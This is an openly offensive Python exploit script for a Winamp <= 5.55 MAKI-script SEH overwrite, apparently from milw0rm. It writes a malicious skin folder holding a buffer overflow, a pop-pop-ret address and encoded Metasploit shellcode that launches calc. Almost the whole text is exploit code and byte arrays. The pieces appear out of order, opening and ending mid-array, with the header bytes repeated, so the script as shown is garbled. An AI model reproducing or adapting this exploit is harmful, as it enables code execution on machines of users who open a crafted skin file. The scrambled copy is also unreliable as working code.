"\x00\x00\x40\x18\x05\x00\x00\x00\x02\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00"
"\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00"
"\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x0f\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x12\x00\x00\x00\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01"
"\x00\x00\x00\x21\x19\xa8\xfe\xff\xff\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21"
"\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x01\x14\x00\x00"
"\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x01\x02\x00\x00\x00"
"\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x15\x00\x00\x00\x19\x4d\x00\x00"
"\x00\x30\x02\x01\x15\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x06\x00\x00\x00\x01"
"\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x16\x00\x00\x00\x30\x02\x01\x00\x00"
"\x00\x00\x01\x18\x00\x00\x00\x01\x17\x00\x00\x00\x40\x01\x19\x00\x00\x00\x40\x01"
"\x15\x00\x00\x00\x40\x70\x0b\x00\x00\x00\x01\x02\x01\x01\x00\x00\x00\x21\x01\x1b"
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1a\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30"
"\x02\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00"
"\x00\x00\x01\x00\x00\x00\x00\x01\x1c\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02"
"\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00"
"\x00\x01\x00\x00\x00\x00\x01\x1d\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01"
"\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x00\x01\x1e\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01\x1b"
"\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x12\x00\x00\x00\x01\x1b\x00\x00\x00\x01"
"\x00\x00\x00\x00\x70\x0d\x00\x00\x00\x00\x30\x02\x01\x1b\x00\x00\x00\x21\x01\x01"
"\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01"
"\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21"
"\x01\x01\x00\x00\x00\x21")
skin_xml=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64"
"\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\x79"
"\x65\x73\x22\x3f\x3e\x0d\x0a\x0d\x0a\x3c\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69"
"\x6f\x6e\x4c\x61\x79\x65\x72\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x33\x34\x22\x3e\x0d\x0a"
"\x09\x3c\x73\x6b\x69\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x09\x09\x3c\x76\x65\x72\x73\x69\x6f\x6e\x3e\x31"
"\x2e\x32\x3c\x2f\x76\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x09\x09\x3c\x6e\x61\x6d\x65\x3e\x42\x65\x6e"
"\x74\x6f\x3c\x2f\x6e\x61\x6d\x65\x3e\x0d\x0a\x09\x09\x3c\x61\x75\x74\x68\x6f\x72\x3e\x48\x69\x73\x30"
"\x6b\x34\x3c\x2f\x61\x75\x74\x68\x6f\x72\x3e\x0d\x0a\x09\x09\x3c\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x48"
"\x69\x73\x30\x6b\x34\x3c\x2f\x63\x6f\x6d\x6d\x65\x6e\x74\x3e\x0d\x0a\x09\x09\x3c\x65\x6d\x61\x69\x6c"
"\x3e\x48\x69\x73\x30\x6b\x34\x2e\x68\x6c\x6d\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3c\x2f\x65\x6d"
"\x61\x69\x6c\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x48\x69\x73\x30\x6b"
"\x34\x2e\x70\x6e\x67\x3c\x2f\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x0d\x0a\x09\x09\x3c\x68\x6f"
"\x6d\x65\x70\x61\x67\x65\x3e\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x6e\x61\x6b\x65\x73\x70"
"\x63\x2e\x63\x6f\x6d\x2f\x3c\x2f\x68\x6f\x6d\x65\x70\x61\x67\x65\x3e\x0d\x0a\x09\x3c\x2f\x73\x6b\x69"
"\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x74\x69\x6f\x6e\x3d\x22\x67\x65\x6e\x65\x72\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x3c\x61\x63"
"\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x46\x22\x20\x61\x63"
"\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x46\x49\x4c\x45\x22\x20\x2f\x3e"
"\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c"
"\x74\x2b\x50\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x50"
"\x4c\x41\x59\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62"
"\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x4f\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48"
"\x4f\x54\x4b\x45\x59\x5f\x4f\x50\x54\x49\x4f\x4e\x53\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63"
"\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x49\x22\x20\x61\x63\x74"
"\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x56\x49\x45\x57\x22\x20\x2f\x3e\x0d"
"\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74"
"\x2b\x48\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x48\x45"
"\x4c\x50\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d"
"\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x74\x69\x6f\x6e"
"\x3d\x22\x6e\x6f\x72\x6d\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74"
"\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x53"
"\x48\x4f\x57\x5f\x43\x55\x52\x52\x45\x4e\x54\x5f\x54\x52\x41\x43\x4b\x22\x20\x2f\x3e\x0d\x0a\x09\x3c"
"\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d\x0a\x0d\x0a\x09\x3c\x21\x2d\x2d\x20\x54"
"\x68\x69\x73\x20\x53\x6b\x69\x6e\x20\x75\x73\x65\x73\x20\x73\x68\x61\x72\x65\x64\x20\x47\x72\x61\x70"
"\x68\x69\x63\x73\x2c\x20\x58\x4d\x4c\x20\x61\x6e\x64\x20\x4d\x61\x6b\x69\x20\x66\x72\x6f\x6d\x20\x27"
"\x42\x69\x67\x20\x42\x65\x6e\x74\x6f\x27\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x09\x3c\x73\x63\x72\x69\x70"
"\x74\x73\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6c\x65\x3d\x22\x2f\x73\x63\x72"
"\x69\x70\x74\x73\x2f\x32\x37\x2e\x6d\x61\x6b\x69\x22\x20\x70\x61\x72\x61\x6d\x3d\x22\x73\x6d\x61\x6c"
"\x6c\x22\x2f\x3e\x20\x3c\x21\x2d\x2d\x20\x4d\x75\x73\x74\x20\x62\x65\x20\x6c\x6f\x61\x64\x65\x64\x20"
"\x61\x74\x20\x66\x69\x72\x73\x74\x20\x2d\x2d\x3e\x0d\x0a\x09\x3c\x2f\x73\x63\x72\x69\x70\x74\x73\x3e"
"\x0d\x0a\x0d\x0a\x3c\x2f\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6f\x6e\x4c\x61"
"\x79\x65\x72\x3e")
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x56\x43\x46\x42\x50\x5a")
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode
try:
os.mkdir("dz_skin")
os.mkdir("dz_skin/scripts")
out_maki = open(r'dz_skin/scripts/27.maki', 'w')
out_maki.write(header1+payload+header2)
out_maki.close()
out_xml = open(r'dz_skin/skin.xml', 'w')
out_xml.write(skin_xml)
out_xml.close()
raw_input("\nSkin's files created!\n")
except:
print "Error"
# milw0rm.com [2009-05-22]
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0d\x51\x4a"
"\x91\xe3\xa6\xb5\x32\x35\xf3\xe7\x64\x0f\xf5\xd6\xfa\x93\xb7\x49\x93\xf1\xba\x66"
"\xef\xae\x3e\x98\x7b\xc4\x0d\xe9\x0d\x84\xe7\x4a\xb0\x2c\x04\x0b\xd2\x75\xf7\xfc"
"\xb5\x3a\x02\xb2\x4d\x43\xa1\x4b\xbe\xae\x59\x63\x75\x03\xf3\xc6\x78\x57\xc6\x87"
"\x43\xe7\xfe\x49\x85\xf9\x09\xcc\x53\x2a\xfd\x56\x65\x36\x60\x38\x1b\x46\xa7\x42"
"\xaa\x75\xd8\x3f\x66\x67\xbf\x73\xf4\x7a\x78\xf4\xbb\xb2\xf7\x4e\x9c\xfb\xe7\x4b"
"\xa9\xbe\xa8\x8d\x02\x0c\x37\x3a\xbf\x3c\x9f\x43\x84\xf1\x86\x88\x5b\xcf\x1e\x36"
"\xb6\x5b\x0c\x5d\xe1\x7d\x1f\x4b\xa7\x0f\x8d\x16\x59\x94\x19\x41\x99\xe1\xe3\x4e"
"\x36\xc6\xec\x4b\x97\xcd\x78\xbc\x9c\x86\x28\xb0\xe5\x95\xbe\x45\x72\x20\x91\x41"
"\x93\x5c\xbb\x5f\xf9\xf1\x17\xfd\x4e\x6d\x90\x60\x7e\x53\x2e\x48\xb0\x04\xcc\x94"
"\x61\x88\x56\x72\xc0\xbc\x3a\x40\x22\x6f\xd6\x4b\x8b\xa4\x10\xc8\x29\x93\x25\x47"
"\x4d\x3e\xaa\x97\xd0\xf4\xa8\x4f\x81\x7b\x0a\xf2\x2a\x45\x49\x83\xfa\xbb\xe4\x64"
"\xf4\x81\xd9\x49\xb0\xc0\xa8\x5b\x2e\xc3\xbc\xfd\x3f\x5e\xb6\x62\x5e\x37\x8d\x40"
"\x8d\xea\x76\x81\x4a\xb9\x1b\x77\xbe\x97\x4f\xce\xb0\x77\x19\x4e\x99\x56\xd4\x98"
"\x33\xc9\x6c\x27\x0d\x20\xc2\xa8\xeb\x51\x2a\x4b\xba\x7f\x5d\x4b\xc6\x5d\x4c\x71"
"\x38\xba\x1e\x8d\x9e\x48\x3e\x48\xb9\x60\x8d\x1f\x43\xc5\xc4\x05\x40\xc9\x08\x0f"
"\x39\xaf\x23\x4b\x80\xf3\xb8\xc4\x8f\x7e\xbb\x59\x72\x86\xaa\xef\x0e\x31\xfa\x41"
"\xb7\xdc\x85\xa9\x52\x5b\xcb\x4b\x44\x32\xfd\x7d\x51\x37\x7c\x4e\xbf\x40\x82\xae"
"\x5f\x3a\xdc\x33\x15\xfa\xb9\x5a\x7d\x9a\x57\x45\xab\xc8\x65\x57\xa6\xc6\x7c\xa9"
"\xcd\xdd\x8e\x69\x1e\x8f\xec\x4f\x9b\x12\xf9\x44\xf9\x09\xff\x45\x27\xcd\x64\x6b"
"\x26\x5a\x4b\x4c\x8c\x59\xe6\xa7\x0c\xf6\x49\x3a\xe4\x05\xcb\x6d\xc4\x8a\xc2\x48"
"\xb1\x93\x49\xf0\x91\x0e\xf5\x4a\xff\xcf\xdc\xb4\xfe\x81\xcc\x4b\x96\x1b\x72\x0f"
"\xd5\xbe\x0f\xff\xe1\x8c\xe2\x01\x59\xb0\xd5\x11\x97\x9f\xe4\xde\x6f\x51\x76\x0a"
"\xbd\xf8\xf0\x80\xa5\x1b\xa6\x42\xa0\x93\x32\x36\xa0\x0c\x8d\x4a\x1b\x34\x2e\x9b"
"\x98\x6c\xfa\x40\x8b\x85\x0c\x1b\x6e\xe8\x94\x05\x71\x9b\xd5\x36\xfd\x03\xf8\x4a"
"\x97\x95\x05\x02\xb7\xdb\x26\x7a\x10\xf2\xd5\x7f\xc4\xac\xdf\x48\xa6\xa0\x54\x51"
"\x57\x6c\xdc\x76\x35\xa5\xba\xb5\xb3\x05\xcb\x4d\xad\xc1\xe6\x18\xd2\x8f\x68\x96"
"\xc1\xfe\x29\x61\xb7\xda\x51\x4d\x91\x65\x01\xca\x0c\x1b\x70\xdb\xf7\x14\x95\xd5"
"\x36\xed\xe8\x45\x98\x0f\x3f\x4e\xa0\x52\x2c\xd9\x82\x4b\x3b\x9b\x7a\x66\x0e\x42"
"\x8f\xfc\x79\x41\x15\x80\x9c\x02\x99\x31\xed\xc7\x19\x53\x98\x47\x98\x63\x60\xb1"
"\x5a\x29\x8c\xaa\x4d\xc1\xbb\xe2\xf6\x84\x73\x41\xbd\xb3\xb2\xeb\x2f\x66\x55\x50"
"\x94\x05\xc0\x73\x1f\x96\x1b\x40\x9b\x1b\x67\x24\x27\xac\x41\x65\x0e\x00\x00\x00"
"\x01\x01\x00\x00\xab\xb0")
header2=(
"\x01\x01\x00\x00\x0b\x00\x67\x65\x74\x53\x6b\x69\x6e\x4e\x61\x6d\x65\x01\x01\x00"
"\x00\x0d\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00"
"\x0c\x00\x67\x65\x74\x54\x69\x6d\x65\x4f\x66\x44\x61\x79\x01\x01\x00\x00\x0d\x00"
"\x73\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00\x0a\x00\x6d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x01\x01\x00\x00\x0f\x00\x69\x6e\x74\x65\x67"
"\x65\x72\x54\x6f\x53\x74\x72\x69\x6e\x67\x01\x01\x00\x00\x0e\x00\x6f\x6e\x53\x63"
"\x72\x69\x70\x74\x4c\x6f\x61\x64\x65\x64\x01\x01\x00\x00\x0e\x00\x67\x65\x74\x53"
"\x63\x72\x69\x70\x74\x47\x72\x6f\x75\x70\x0a\x01\x00\x00\x09\x00\x67\x65\x74\x4f"
"\x62\x6a\x65\x63\x74\x17\x01\x00\x00\x0b\x00\x6f\x6e\x4c\x65\x66\x74\x43\x6c\x69"
"\x63\x6b\x01\x01\x00\x00\x12\x00\x6e\x61\x76\x69\x67\x61\x74\x65\x55\x72\x6c\x42"
"\x72\x6f\x77\x73\x65\x72\x01\x01\x00\x00\x19\x00\x67\x65\x74\x50\x6c\x61\x79\x49"
"\x74\x65\x6d\x4d\x65\x74\x61\x44\x61\x74\x61\x53\x74\x72\x69\x6e\x67\x01\x01\x00"
"\x00\x17\x00\x67\x65\x74\x50\x6c\x61\x79\x49\x74\x65\x6d\x44\x69\x73\x70\x6c\x61"
"\x79\x54\x69\x74\x6c\x65\x1f\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x00\x00\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x0e\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x72\x75\x6e\x74\x69\x6d"
"\x65\x63\x68\x65\x63\x6b\x0c\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63\x72"
"\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0d\x00\x00\x00\x1f\x00\x57"
"\x69\x6e\x61\x6d\x70\x20\x35\x2e\x35\x34\x20\x28\x73\x6b\x69\x6e\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x20\x31\x2e\x33\x34\x29\x0e\x00\x00\x00\x05\x00\x45\x72\x72\x6f"
"\x72\x0f\x00\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x14\x00"
"\x00\x00\x0a\x00\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x16\x00\x00\x00\x12\x00"
"\x77\x69\x6e\x73\x68\x61\x64\x65\x69\x63\x6f\x6e\x6d\x6f\x64\x65\x72\x6e\x18\x00"
"\x00\x00\x31\x00\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6c\x69\x65\x6e\x74\x2e\x77\x69"
"\x6e\x61\x6d\x70\x2e\x63\x6f\x6d\x2f\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x2f"
"\x61\x72\x74\x69\x73\x74\x2f\x3f\x69\x63\x69\x64\x3d\x19\x00\x00\x00\x0c\x00\x26"
"\x61\x72\x74\x69\x73\x74\x4e\x61\x6d\x65\x3d\x1a\x00\x00\x00\x06\x00\x61\x72\x74"
"\x69\x73\x74\x1c\x00\x00\x00\x0b\x00\x75\x76\x6f\x78\x2f\x61\x72\x74\x69\x73\x74"
"\x1d\x00\x00\x00\x0a\x00\x63\x62\x73\x2f\x61\x72\x74\x69\x73\x74\x1e\x00\x00\x00"
"\x0b\x00\x73\x74\x72\x65\x61\x6d\x74\x69\x74\x6c\x65\x02\x00\x00\x00\x00\x00\x00"
"\x00\x07\x00\x00\x00\x53\x01\x00\x00\x13\x00\x00\x00\x0a\x00\x00\x00\x86\x01\x00"
"\x00\xd1\x02\x00\x00\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00"
"\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0c\x01\x03\x00\x00\x00\x01\x05"
"\x00\x00\x00\x0a\x51\x10\xb9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00"
"\x30\x02\x01\x09\x00\x00\x00\x01\x00\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00"
"\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0a\x00\x00"
"\x00\x01\x09\x00\x00\x00\x41\x01\x0b\x00\x00\x00\x0c\x01\x09\x00\x00\x00\x01\x0a"
"\x00\x00\x00\x0c\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00"
"\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x06\x00\x00\x00\x01\x0e\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x0d\x00"
"\x00\x00\x40\x18\x05\x00\x00\x00\x02\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00"
"\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00"
"\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x0f\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00"
"\x01\x12\x00\x00\x00\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01"
"\x00\x00\x00\x21\x19\xa8\xfe\xff\xff\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21"
"\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x01\x14\x00\x00"
"\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x01\x02\x00\x00\x00"
"\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x15\x00\x00\x00\x19\x4d\x00\x00"
"\x00\x30\x02\x01\x15\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x06\x00\x00\x00\x01"
"\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x16\x00\x00\x00\x30\x02\x01\x00\x00"
"\x00\x00\x01\x18\x00\x00\x00\x01\x17\x00\x00\x00\x40\x01\x19\x00\x00\x00\x40\x01"
"\x15\x00\x00\x00\x40\x70\x0b\x00\x00\x00\x01\x02\x01\x01\x00\x00\x00\x21\x01\x1b"
"\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1a\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30"
"\x02\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00"
"\x00\x00\x01\x00\x00\x00\x00\x01\x1c\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02"
"\x01\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00"
"\x00\x01\x00\x00\x00\x00\x01\x1d\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01"
"\x1b\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x17\x00\x00\x00\x01\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x00\x01\x1e\x00\x00\x00\x70\x0c\x00\x00\x00\x01\x30\x02\x01\x1b"
"\x00\x00\x00\x01\x0f\x00\x00\x00\x08\x10\x12\x00\x00\x00\x01\x1b\x00\x00\x00\x01"
"\x00\x00\x00\x00\x70\x0d\x00\x00\x00\x00\x30\x02\x01\x1b\x00\x00\x00\x21\x01\x01"
"\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01\x01\x00\x00\x00\x21\x21\x01"
